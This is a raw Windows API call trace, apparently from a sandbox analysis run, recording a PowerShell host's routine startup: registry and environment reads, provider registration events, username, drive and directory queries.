	[0673.320] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d538 | out: phkResult=0x16d538*=0x3a8) returned 0x0
	[0673.320] RegCloseKey (hKey=0x3a8) returned 0x0
	[0673.321] RegCloseKey (hKey=0x384) returned 0x0
	[0673.321] RegCloseKey (hKey=0x3a4) returned 0x0
	[0673.326] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x28e0008
	[0674.690] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e921e8*="WSMan", lpRawData=0x2e91f58) returned 1
	[0674.692] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0674.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0674.692] CoTaskMemFree (pv=0x2f95e0) 
	[0674.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.694] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0674.695] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0674.695] CoTaskMemFree (pv=0x1b8eaee0) 
	[0674.695] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0674.695] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0674.695] CoTaskMemFree (pv=0x293a20) 
	[0674.696] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e97720*="Alias", lpRawData=0x2e974b0) returned 1
	[0674.697] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0674.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0674.697] CoTaskMemFree (pv=0x2f95e0) 
	[0674.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0674.700] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0674.700] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0674.700] CoTaskMemFree (pv=0x1b8eaee0) 
	[0674.700] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0674.700] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0674.700] CoTaskMemFree (pv=0x293a20) 
	[0674.704] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9cd18*="Environment", lpRawData=0x2e9caa8) returned 1
	[0674.705] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0674.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0674.705] CoTaskMemFree (pv=0x2f95e0) 
	[0674.706] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0674.706] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0674.706] CoTaskMemFree (pv=0x2f95e0) 
	[0674.707] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0674.707] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0674.707] CoTaskMemFree (pv=0x2f95e0) 
	[0674.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0674.707] SetErrorMode (uMode=0x1) returned 0x1
	[0674.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d580 | out: lpFileInformation=0x16d580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0674.707] SetErrorMode (uMode=0x1) returned 0x1
	[0674.709] GetLogicalDrives () returned 0x4
	[0674.709] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0674.710] SetErrorMode (uMode=0x1) returned 0x1
	[0674.711] CoTaskMemAlloc (cb=0x68) returned 0x2f8520
	[0674.711] CoTaskMemAlloc (cb=0x68) returned 0x2f84b0
	[0674.712] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f8520, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d550, lpMaximumComponentLength=0x16d54c, lpFileSystemFlags=0x16d548, lpFileSystemNameBuffer=0x2f84b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d550*=0x9c354b42, lpMaximumComponentLength=0x16d54c*=0xff, lpFileSystemFlags=0x16d548*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0674.712] CoTaskMemFree (pv=0x2f8520) 
	[0674.712] CoTaskMemFree (pv=0x2f84b0) 
	[0674.712] SetErrorMode (uMode=0x1) returned 0x1
	[0674.712] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0674.713] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.713] SetErrorMode (uMode=0x1) returned 0x1
	[0674.714] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d4f0 | out: lpFileInformation=0x16d4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0674.714] SetErrorMode (uMode=0x1) returned 0x1
	[0674.714] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.714] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0674.714] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0674.718] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.718] SetErrorMode (uMode=0x1) returned 0x1
	[0674.718] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d320 | out: lpFileInformation=0x16d320*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0674.719] SetErrorMode (uMode=0x1) returned 0x1
	[0674.719] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.719] SetErrorMode (uMode=0x1) returned 0x1
	[0674.719] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d320 | out: lpFileInformation=0x16d320*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0674.719] SetErrorMode (uMode=0x1) returned 0x1
	[0674.719] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0674.719] SetErrorMode (uMode=0x1) returned 0x1
	[0674.719] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0674.720] SetErrorMode (uMode=0x1) returned 0x1
	[0674.720] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0674.720] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0674.720] CoTaskMemFree (pv=0x1b8eaee0) 
	[0674.720] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0674.720] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0674.721] CoTaskMemFree (pv=0x293a20) 
	[0674.721] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea3e08*="FileSystem", lpRawData=0x2ea3b98) returned 1
	[0676.333] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0676.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.333] CoTaskMemFree (pv=0x2f95e0) 
	[0676.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0676.335] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0676.335] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0676.336] CoTaskMemFree (pv=0x1b8eaee0) 
	[0676.336] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0676.336] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0676.336] CoTaskMemFree (pv=0x293a20) 
	[0676.339] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea9648*="Function", lpRawData=0x2ea93d8) returned 1
	[0678.154] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0678.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.155] CoTaskMemFree (pv=0x2f95e0) 
	[0678.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0678.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0678.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0678.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0679.844] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0679.844] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0679.845] CoTaskMemFree (pv=0x1b8eaee0) 
	[0679.845] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0679.845] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0679.845] CoTaskMemFree (pv=0x293a20) 
	[0679.845] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ecbe70*="Registry", lpRawData=0x2ecbc00) returned 1
	[0681.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0681.452] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0681.452] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0681.452] CoTaskMemFree (pv=0x1b8eaee0) 
	[0681.452] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0681.452] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0681.453] CoTaskMemFree (pv=0x293a20) 
	[0681.453] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed1288*="Variable", lpRawData=0x2ed1018) returned 1
	[0681.491] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0681.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.491] CoTaskMemFree (pv=0x2f95e0) 
	[0681.494] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0681.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.494] CoTaskMemFree (pv=0x2f95e0) 
	[0681.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0681.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0681.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0681.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0683.229] CoTaskMemAlloc (cb=0x804) returned 0x1b8eaee0
	[0683.229] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8eaee0, nSize=0x16d7c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d7c8) returned 0x1
	[0683.230] CoTaskMemFree (pv=0x1b8eaee0) 
	[0683.230] CoTaskMemAlloc (cb=0x204) returned 0x293a20
	[0683.230] GetUserNameW (in: lpBuffer=0x293a20, pcbBuffer=0x16d808 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d808) returned 1
	[0683.230] CoTaskMemFree (pv=0x293a20) 
	[0683.231] ReportEventW (hEventLog=0x28e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ee4ea0*="Certificate", lpRawData=0x2ee4c30) returned 1
	[0685.682] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0685.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.682] CoTaskMemFree (pv=0x2f95e0) 
	[0685.686] GetLogicalDrives () returned 0x4
	[0685.686] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0685.686] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0685.687] CoTaskMemAlloc (cb=0x20e) returned 0x2e5ae0
	[0685.687] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2e5ae0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0685.687] CoTaskMemFree (pv=0x2e5ae0) 
	[0685.689] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0685.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.689] CoTaskMemFree (pv=0x2f95e0) 
	[0685.689] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0685.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.689] CoTaskMemFree (pv=0x2f95e0) 
	[0685.709] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0685.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.709] CoTaskMemFree (pv=0x2f95e0) 
	[0685.710] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0685.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0685.710] CoTaskMemFree (pv=0x2f95e0) 
	[0685.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0685.711] SetErrorMode (uMode=0x1) returned 0x1
	[0685.711] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d410 | out: lpFileInformation=0x16d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0685.711] SetErrorMode (uMode=0x1) returned 0x1
	[0685.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0685.711] SetErrorMode (uMode=0x1) returned 0x1
	[0685.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d410 | out: lpFileInformation=0x16d410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0685.712] SetErrorMode (uMode=0x1) returned 0x1
	[0685.712] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
